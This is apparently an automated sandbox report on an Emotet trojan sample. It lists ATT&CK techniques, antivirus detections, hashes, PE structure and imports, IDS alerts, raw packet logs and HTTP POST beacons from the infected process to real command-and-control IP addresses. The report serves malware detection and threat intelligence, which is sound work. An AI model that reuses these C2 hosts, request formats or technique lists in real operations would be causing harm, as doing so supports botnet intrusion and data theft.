              Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
              Discovery: 1 System Time Discovery; 21 Security Software Discovery; 2 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 2 File and Directory Discovery; 15 System Information Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
              Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
              Command and Control: 22 Encrypted Channel; 11 Non-Standard Port; 1 Non-Application Layer Protocol; 112 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
              Impact: 1 Data Encrypted for Impact; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
              Source | Detection | Scanner | Label
              ExeFile (356).exe | 97% | ReversingLabs | Win32.Trojan.Emotet
              ExeFile (356).exe | 100% | Avira | HEUR/AGEN.1318091
              ExeFile (356).exe | 100% | Joe Sandbox ML |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No contacted domains info
              Joe Sandbox version: 40.0.0 Tourmaline
              Analysis ID: 1495910
              Start date and time: 2024-08-20 17:46:03 +02:00
              Joe Sandbox product: CloudBasic
              Overall analysis duration: 0h 4m 45s
              Hypervisor based Inspection enabled: false
              Report type: full
              Cookbook file name: default.jbs
              Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed: 7
              Number of new started drivers analysed: 0
              Number of existing processes analysed: 0
              Number of existing drivers analysed: 0
              Number of injected processes analysed: 0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode: default
              Analysis stop reason: Timeout
              Sample name: ExeFile (356).exe
              Detection: MAL
              Classification: mal100.troj.evad.winEXE@4/0@0/97
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 46
              • Number of non-executed functions: 73
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: ExeFile (356).exe
              No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
94.200.114.161 | ExeFile (226).exe | malicious | Emotet | 94.200.114.161/KN2k/QHavZNk7lTSx8eJLpbP/0vd7gjsQ5TsEb0Rcx/
| ExeFile (106).exe | malicious | Emotet | 94.200.114.161/cHAjU/OuEQIhBlus38A7g/
71.72.196.159 | ExeFile (196).exe | malicious | Emotet | 71.72.196.159/2IGyEh4lLVAFVrg/6EDAF/YrTlOqfPq/7ALhWaZlzInVzVn7fD/bAqO88sEz98xOzh/VXmfH3epoFKlKrI/
| 3Zn3npGt2R.doc | malicious | Unknown | 71.72.196.159/jzbe8u/
85.152.162.105 | ExeFile (226).exe | malicious | Emotet |
| ExeFile (145).exe | malicious | Emotet |
| ExeFile (156).exe | malicious | Emotet |
| ExeFile (196).exe | malicious | Emotet |
| ExeFile (106).exe | malicious | Emotet |
| KBDYAK.exe | malicious | Emotet |
| task1.exe | malicious | Emotet |
| task1.exe | malicious | Emotet |
| task1.exe | malicious | Emotet |
| task1.exe | malicious | Emotet |
                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TWC-10796-MIDWESTUS | ExeFile (369).exe | malicious | Emotet | 74.136.144.133
| ExeFile (367).exe | malicious | Emotet | 72.135.200.124
| ExeFile (371).exe | malicious | Emotet | 74.136.144.133
| ExeFile (378).exe | malicious | Emotet | 74.136.144.133
| ExeFile (384).exe | malicious | Emotet | 174.100.27.229
| ExeFile (388).exe | malicious | Emotet | 66.61.94.36
| ExeFile (39).exe | malicious | Emotet | 66.61.94.36
| ExeFile (394).exe | malicious | Emotet | 74.135.120.91
| ExeFile (22).exe | malicious | Emotet | 71.72.196.159
| ExeFile (286).exe | malicious | Emotet | 74.135.120.91
TELECABLESpainES | ExeFile (226).exe | malicious | Emotet | 85.152.162.105
| ExeFile (145).exe | malicious | Emotet | 85.152.162.105
| ExeFile (156).exe | malicious | Emotet | 85.152.162.105
| ExeFile (171).exe | malicious | Emotet | 93.156.165.186
| ExeFile (196).exe | malicious | Emotet | 85.152.162.105
| ExeFile (106).exe | malicious | Emotet | 85.152.162.105
| jew.m68k.elf | malicious | Unknown | 188.171.114.252
| arm7.elf | malicious | Mirai | 188.171.226.33
| SZwdzMMRBU.elf | malicious | Unknown | 85.152.244.213
| VapIQOTGj7.elf | malicious | Gafgyt, Mirai, Moobot, Okiru | 212.89.7.12
DU-AS1AE | ExeFile (377).exe | malicious | Emotet | 91.75.75.46
| ExeFile (384).exe | malicious | Emotet | 94.206.45.18
| ExeFile (39).exe | malicious | Emotet | 91.75.75.46
| ExeFile (64).exe | malicious | Emotet | 91.75.75.46
| ExeFile (22).exe | malicious | Emotet | 94.200.114.161
| ExeFile (285).exe | malicious | Emotet | 91.75.75.46
| ExeFile (226).exe | malicious | Emotet | 94.200.114.161
| ExeFile (145).exe | malicious | Emotet | 94.200.114.161
| ExeFile (196).exe | malicious | Emotet | 94.200.114.161
| ExeFile (106).exe | malicious | Emotet | 94.200.114.161
                                  No context
                                  No context
                                  No created / dropped files found
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):6.185253964595847
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:ExeFile (356).exe
                                  File size:437'248 bytes
                                  MD5:4c1c997c16309a2d391e1d39988000cc
                                  SHA1:199ebff853acd5f3209ea81c75d48d1db20334cc
                                  SHA256:c37ae465ddd63d49f36380cf223d1b0d3117021190d73bc37ee132ec10020342
                                  SHA512:835ac956a6c9c89802caa93e6e84aab306bb604bd93f6ca20ba428fb5f8217a18f5c840217368fbb0883555ce004c6ed8b2a46ce7d272d50910c18dcb9d5bb92
                                  SSDEEP:6144:vXBr9LW/6DUvum8W71YQvq6H/iaRT8oITZO/rVurq:vXdNDDUvum8W5lv7Ha+ThmZo5uG
                                  TLSH:6D947B136AC4C138F4961B35F8AAEAF14391BD1A5F3882CBFEC4775B6D671809C36606
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|..L...L...L...#k..\...#k*.,...Ee..A...L...<...#k+.e...#k..M...k.[.M...#k..M...RichL...................PE..L.....e_...........
                                  Icon Hash:0e0e0f0d1e3add1f
                                  Entrypoint:0x410a9b
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x5F6508C3 [Fri Sep 18 19:21:39 2020 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:39948763cc1873dc50981ea479aab099
                                  Programming Language:
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [IMP] VS2008 SP1 build 30729
                                  • [C++] VS2010 build 30319
                                  • [EXP] VS2010 build 30319
                                  • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x1c9f0 | 0x42 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1c01c | 0x8c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x22000 | 0x4c1f0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6f000 | 0xeec | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x191f0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1b838 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x19000 | 0x1ac | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x17a6e | 0x17c00 | 2918294d11fcf50d51f870e66a4e619e | False | 0.5352487664473684 | DOS executable (COM) | 6.120585434914318 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x19000 | 0x3a32 | 0x3c00 | 781ea65d4fba89049baed19ff8fd7748 | False | 0.35279947916666665 | data | 4.850442112080569 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1d000 | 0x416c | 0x1000 | c6306a330127025aa96c1b57a0fcd902 | False | 0.221923828125 | data | 2.5497119214608133 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x22000 | 0x4c1f0 | 0x4c200 | add876cb58db3633c854af0e75fe9ec8 | False | 0.31388867508210183 | data | 6.141207657208505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6f000 | 0x1d30 | 0x1e00 | ea9aac25c86f4cd5d2db5957b7bc6e8f | False | 0.4217447916666667 | data | 4.176257282412653 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
DAGHHHHHTY | 0x22520 | 0xde00 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | English | United States | 0.506809543918919
RT_ICON | 0x30320 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x328c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x34e70 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x37418 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x399c0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x3bf68 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x3e510 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x40ab8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x43060 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x45608 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x47bb0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x4a158 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x4c700 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x4eca8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x51250 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x537f8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x55da0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x58348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x5a8f0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_ICON | 0x5ce98 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5428423236514522
RT_GROUP_ICON | 0x5f440 | 0x11e | data | English | United States | 0.24125874125874125
RT_MANIFEST | 0x5f560 | 0x15a | ASCII text, with CRLF line terminators | English | United States | 0.5491329479768786
None | 0x5f6bc | 0xeb33 | data | English | United States | 1.0004318147846738
DLL | Import
KERNEL32.dll | VirtualAlloc, Process32NextW, Process32FirstW, CreateToolhelp32Snapshot, CreateThread, SetStdHandle, SetFilePointer, WriteConsoleW, LoadLibraryW, GetStringTypeW, LCMapStringW, FlushFileBuffers, GetConsoleMode, GetConsoleCP, HeapReAlloc, MultiByteToWideChar, CreateProcessW, OpenProcess, TerminateProcess, QueryFullProcessImageNameW, CloseHandle, GetCurrentProcess, GetLastError, FormatMessageW, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, GetSystemTimeAsFileTime, HeapAlloc, RaiseException, RtlUnwind, EncodePointer, DecodePointer, GetCommandLineA, HeapSetInformation, GetStartupInfoW, HeapFree, EnterCriticalSection, LeaveCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, GetProcAddress, GetModuleHandleW, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, HeapCreate, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, CreateFileW
USER32.dll | SendMessageW, CreateWindowExW, wsprintfW, LoadIconW, LoadCursorW, RegisterClassExW, SetTimer, UpdateWindow, GetMessageW, TranslateMessage, DispatchMessageW, PostQuitMessage, ShowWindow, MessageBoxW, SetWindowTextW, GetWindowTextW, DefWindowProcW
ADVAPI32.dll | GetUserNameW, GetTokenInformation, LookupAccountSidW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges
COMCTL32.dll | InitCommonControlsEx
PSAPI.DLL | GetProcessMemoryInfo
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
Name | Ordinal | Address
Run | 1 | 0x40ec40
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-20T17:47:30.327401+0200 | TCP | 2854388 | ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 | 1 | 49723 | 8080 | 192.168.2.12 | 120.138.30.150
2024-08-20T17:48:48.814321+0200 | TCP | 2854388 | ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 | 1 | 62418 | 80 | 192.168.2.12 | 174.45.13.118
2024-08-20T17:47:03.074373+0200 | TCP | 2854388 | ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 | 1 | 62404 | 443 | 192.168.2.12 | 94.23.237.171
2024-08-20T17:48:53.453903+0200 | TCP | 2854388 | ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 | 1 | 62419 | 8080 | 192.168.2.12 | 87.106.136.232
2024-08-20T17:47:59.609413+0200 | TCP | 2854388 | ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 | 1 | 49726 | 8080 | 192.168.2.12 | 137.59.187.107
                                  Aug 20, 2024 17:48:10.493989944 CEST8062406156.155.166.221192.168.2.12
                                  Aug 20, 2024 17:48:10.494025946 CEST8062406156.155.166.221192.168.2.12
                                  Aug 20, 2024 17:48:10.494035959 CEST8062406156.155.166.221192.168.2.12
                                  Aug 20, 2024 17:48:10.494070053 CEST8062406156.155.166.221192.168.2.12
                                  Aug 20, 2024 17:48:10.494119883 CEST8062406156.155.166.221192.168.2.12
                                  Aug 20, 2024 17:48:10.494129896 CEST8062406156.155.166.221192.168.2.12
                                  Aug 20, 2024 17:48:13.359842062 CEST6240780192.168.2.1250.35.17.13
                                  Aug 20, 2024 17:48:13.364779949 CEST806240750.35.17.13192.168.2.12
                                  Aug 20, 2024 17:48:13.365006924 CEST6240780192.168.2.1250.35.17.13
                                  Aug 20, 2024 17:48:13.365008116 CEST6240780192.168.2.1250.35.17.13
                                  Aug 20, 2024 17:48:13.365048885 CEST6240780192.168.2.1250.35.17.13
                                  Aug 20, 2024 17:48:13.370033026 CEST806240750.35.17.13192.168.2.12
                                  Aug 20, 2024 17:48:13.370223999 CEST806240750.35.17.13192.168.2.12
                                  Aug 20, 2024 17:48:13.370254040 CEST806240750.35.17.13192.168.2.12
                                  Aug 20, 2024 17:48:13.370264053 CEST806240750.35.17.13192.168.2.12
                                  Aug 20, 2024 17:48:13.370279074 CEST806240750.35.17.13192.168.2.12
                                  Aug 20, 2024 17:48:13.370287895 CEST806240750.35.17.13192.168.2.12
                                  Aug 20, 2024 17:48:16.872211933 CEST6240880192.168.2.12153.137.36.142
                                  Aug 20, 2024 17:48:16.877244949 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:16.877353907 CEST6240880192.168.2.12153.137.36.142
                                  Aug 20, 2024 17:48:16.877501965 CEST6240880192.168.2.12153.137.36.142
                                  Aug 20, 2024 17:48:16.877532959 CEST6240880192.168.2.12153.137.36.142
                                  Aug 20, 2024 17:48:16.882364035 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:16.882385015 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:16.882414103 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:16.882425070 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:16.882435083 CEST6240880192.168.2.12153.137.36.142
                                  Aug 20, 2024 17:48:16.882450104 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:16.882559061 CEST6240880192.168.2.12153.137.36.142
                                  Aug 20, 2024 17:48:16.883310080 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:16.887274027 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:16.887507915 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:19.948684931 CEST624097080192.168.2.1291.211.88.52
                                  Aug 20, 2024 17:48:19.953665972 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:19.953783989 CEST624097080192.168.2.1291.211.88.52
                                  Aug 20, 2024 17:48:19.954139948 CEST624097080192.168.2.1291.211.88.52
                                  Aug 20, 2024 17:48:19.954278946 CEST624097080192.168.2.1291.211.88.52
                                  Aug 20, 2024 17:48:19.958830118 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:19.958899021 CEST624097080192.168.2.1291.211.88.52
                                  Aug 20, 2024 17:48:19.959026098 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:19.959043026 CEST624097080192.168.2.1291.211.88.52
                                  Aug 20, 2024 17:48:19.959196091 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:19.959261894 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:19.959271908 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:19.959670067 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:19.963711977 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:19.963984966 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:22.184917927 CEST624108080192.168.2.12209.141.54.221
                                  Aug 20, 2024 17:48:22.190300941 CEST808062410209.141.54.221192.168.2.12
                                  Aug 20, 2024 17:48:22.190401077 CEST624108080192.168.2.12209.141.54.221
                                  Aug 20, 2024 17:48:22.190536976 CEST624108080192.168.2.12209.141.54.221
                                  Aug 20, 2024 17:48:22.190576077 CEST624108080192.168.2.12209.141.54.221
                                  Aug 20, 2024 17:48:22.195311069 CEST808062410209.141.54.221192.168.2.12
                                  Aug 20, 2024 17:48:22.195456982 CEST808062410209.141.54.221192.168.2.12
                                  Aug 20, 2024 17:48:22.195466042 CEST808062410209.141.54.221192.168.2.12
                                  Aug 20, 2024 17:48:22.195708036 CEST808062410209.141.54.221192.168.2.12
                                  Aug 20, 2024 17:48:22.195718050 CEST808062410209.141.54.221192.168.2.12
                                  Aug 20, 2024 17:48:22.196754932 CEST808062410209.141.54.221192.168.2.12
                                  Aug 20, 2024 17:48:24.555346012 CEST62411443192.168.2.12185.94.252.104
                                  Aug 20, 2024 17:48:24.555401087 CEST44362411185.94.252.104192.168.2.12
                                  Aug 20, 2024 17:48:24.555481911 CEST62411443192.168.2.12185.94.252.104
                                  Aug 20, 2024 17:48:24.555603981 CEST62411443192.168.2.12185.94.252.104
                                  Aug 20, 2024 17:48:24.555614948 CEST44362411185.94.252.104192.168.2.12
                                  Aug 20, 2024 17:48:24.555649042 CEST62411443192.168.2.12185.94.252.104
                                  Aug 20, 2024 17:48:24.555660009 CEST44362411185.94.252.104192.168.2.12
                                  Aug 20, 2024 17:48:24.555753946 CEST44362411185.94.252.104192.168.2.12
                                  Aug 20, 2024 17:48:27.429323912 CEST6241880192.168.2.12174.45.13.118
                                  Aug 20, 2024 17:48:27.434710026 CEST8062418174.45.13.118192.168.2.12
                                  Aug 20, 2024 17:48:27.434808016 CEST6241880192.168.2.12174.45.13.118
                                  Aug 20, 2024 17:48:27.434936047 CEST6241880192.168.2.12174.45.13.118
                                  Aug 20, 2024 17:48:27.434988022 CEST6241880192.168.2.12174.45.13.118
                                  Aug 20, 2024 17:48:27.439925909 CEST8062418174.45.13.118192.168.2.12
                                  Aug 20, 2024 17:48:27.439960003 CEST8062418174.45.13.118192.168.2.12
                                  Aug 20, 2024 17:48:27.439994097 CEST8062418174.45.13.118192.168.2.12
                                  Aug 20, 2024 17:48:27.440048933 CEST8062418174.45.13.118192.168.2.12
                                  Aug 20, 2024 17:48:27.440411091 CEST8062418174.45.13.118192.168.2.12
                                  Aug 20, 2024 17:48:48.814197063 CEST8062418174.45.13.118192.168.2.12
                                  Aug 20, 2024 17:48:48.814321041 CEST6241880192.168.2.12174.45.13.118
                                  Aug 20, 2024 17:48:48.814505100 CEST6241880192.168.2.12174.45.13.118
                                  Aug 20, 2024 17:48:48.819361925 CEST8062418174.45.13.118192.168.2.12
                                  Aug 20, 2024 17:48:51.780136108 CEST624198080192.168.2.1287.106.136.232
                                  Aug 20, 2024 17:48:51.785180092 CEST80806241987.106.136.232192.168.2.12
                                  Aug 20, 2024 17:48:51.785458088 CEST624198080192.168.2.1287.106.136.232
                                  Aug 20, 2024 17:48:51.785458088 CEST624198080192.168.2.1287.106.136.232
                                  Aug 20, 2024 17:48:51.785516024 CEST624198080192.168.2.1287.106.136.232
                                  Aug 20, 2024 17:48:51.790793896 CEST80806241987.106.136.232192.168.2.12
                                  Aug 20, 2024 17:48:51.790872097 CEST80806241987.106.136.232192.168.2.12
                                  Aug 20, 2024 17:48:51.790894032 CEST80806241987.106.136.232192.168.2.12
                                  Aug 20, 2024 17:48:51.790999889 CEST80806241987.106.136.232192.168.2.12
                                  Aug 20, 2024 17:48:51.791013002 CEST80806241987.106.136.232192.168.2.12
                                  Aug 20, 2024 17:48:53.453581095 CEST80806241987.106.136.232192.168.2.12
                                  Aug 20, 2024 17:48:53.453902960 CEST624198080192.168.2.1287.106.136.232
                                  Aug 20, 2024 17:48:53.457211971 CEST624198080192.168.2.1287.106.136.232
                                  Aug 20, 2024 17:48:53.462081909 CEST80806241987.106.136.232192.168.2.12
                                  Aug 20, 2024 17:48:57.132818937 CEST6242080192.168.2.1262.75.141.82
                                  Aug 20, 2024 17:48:57.137806892 CEST806242062.75.141.82192.168.2.12
                                  Aug 20, 2024 17:48:57.137926102 CEST6242080192.168.2.1262.75.141.82
                                  Aug 20, 2024 17:48:57.138402939 CEST6242080192.168.2.1262.75.141.82
                                  Aug 20, 2024 17:48:57.138427973 CEST6242080192.168.2.1262.75.141.82
                                  Aug 20, 2024 17:48:57.143229961 CEST806242062.75.141.82192.168.2.12
                                  Aug 20, 2024 17:48:57.143284082 CEST806242062.75.141.82192.168.2.12
                                  Aug 20, 2024 17:48:57.143292904 CEST806242062.75.141.82192.168.2.12
                                  Aug 20, 2024 17:48:57.143306971 CEST806242062.75.141.82192.168.2.12
                                  Aug 20, 2024 17:48:57.146547079 CEST806242062.75.141.82192.168.2.12
                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                   Aug 20, 2024 17:47:38.894963980 CEST | 53 | 55630 | 162.159.36.2 | 192.168.2.12
                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   0 | 192.168.2.12 | 49712 | 71.72.196.159 | 80 | 6716 | C:\Windows\SysWOW64\provcore\Websocket.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Aug 20, 2024 17:47:21.373636007 CEST | 542 | OUT | POST /U79iM382/IZ04Joc/eLC1daPUos8/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 71.72.196.159/U79iM382/IZ04Joc/eLC1daPUos8/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=------------cs4fTNfbtTQb
                                  Host: 71.72.196.159
                                  Content-Length: 4660
                                  Cache-Control: no-cache
                                   Aug 20, 2024 17:47:21.373673916 CEST | 4660 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 73 34 66 54 4e 66 62 74 54 51 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6e 6c 7a 75 6c 6f 73 74 70 65 68 6e 67 6d
                                  Data Ascii: --------------cs4fTNfbtTQbContent-Disposition: form-data; name="nlzulostpehngmd"; filename="aapskeqwasxvhodscxn"Content-Type: application/octet-streamYyF7X95*,K4_[E"lf2%TnrfvFASDi


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   1 | 192.168.2.12 | 49722 | 134.209.36.254 | 8080 | 6716 | C:\Windows\SysWOW64\provcore\Websocket.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Aug 20, 2024 17:47:24.943783045 CEST | 657 | OUT | POST /T5Vg4Qw6cjD/Ig1s2FXtpuz/TQ9zRX6lxh/onfM1cXpehs4Ys/zuNlQfl2ySC/vyKTBvDcyugOiz5nO8/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 134.209.36.254/T5Vg4Qw6cjD/Ig1s2FXtpuz/TQ9zRX6lxh/onfM1cXpehs4Ys/zuNlQfl2ySC/vyKTBvDcyugOiz5nO8/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=--------------mk75J6XmW2R3bq
                                  Host: 134.209.36.254:8080
                                  Content-Length: 4660
                                  Cache-Control: no-cache


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   2 | 192.168.2.12 | 49723 | 120.138.30.150 | 8080 | 6716 | C:\Windows\SysWOW64\provcore\Websocket.exe
                                   Timestamp | Bytes transferred | Direction | Data
